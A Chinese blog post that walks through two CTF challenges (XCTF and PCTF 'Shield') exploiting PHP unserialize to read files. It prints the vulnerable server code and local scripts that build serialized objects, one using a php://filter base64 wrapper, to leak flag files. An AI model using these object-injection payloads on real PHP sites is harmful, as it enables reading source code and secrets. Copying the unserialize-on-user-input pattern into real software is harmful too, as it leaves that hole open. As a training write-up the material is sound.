标签 反序列化 下的文章

WEB中反序列化读取文件

  • 本文已发布在合天智汇,禁止转发。

XCTF的一道题

<?php
class flag{
    public $file;
    public function __tostring(){
        echo file_get_contents($this->file);
        return 'yes';
    }
}

$a = new flag();
$a->file = 'php://filter/convert.base64-encode/resource=flag.php';
$data = serialize($a);
echo $data.'<br>';
echo unserialize($data);

神盾局的秘密 --pctf

读取showimg.php

<?php
    $f = $_GET['img'];
    if (!empty($f)) {
        $f = base64_decode($f);
        if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE
        && stripos($f,'pctf')===FALSE) {
            readfile($f);
        } else {
            echo "File not found!";
        }
    }
?>

读取index.php

<?php 
    require_once('shield.php');
    $x = new Shield();
    isset($_GET['class']) && $g = $_GET['class'];
    if (!empty($g)) {
        $x = unserialize($g);
    }
    echo $x->readfile();
?>
<img src="showimg.php?img=c2hpZWxkLmpwZw==" width="100%"/>

读取shield.php

<?php
    //flag is in pctf.php
    class Shield {
        public $file;
        function __construct($filename = '') {
            $this -> file = $filename;
        }
        
        function readfile() {
            if (!empty($this->file) && stripos($this->file,'..')===FALSE  
            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
                return @file_get_contents($this->file);
            }
        }
    }
?>

本地测试代码:

<?php
    class Shield {
        public $file;
        function __construct($filename = '') {
            $this -> file = $filename;
        }

        function readfile() {
            if (!empty($this->file) && stripos($this->file,'..')===FALSE  
            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
                return @file_get_contents($this->file);
            }
        }
    }

    $shield = new Shield('pctf.php');
    $data = serialize($shield);
    echo $data;
    $res = unserialize($data);
    echo $res->readfile();
    
?>
preView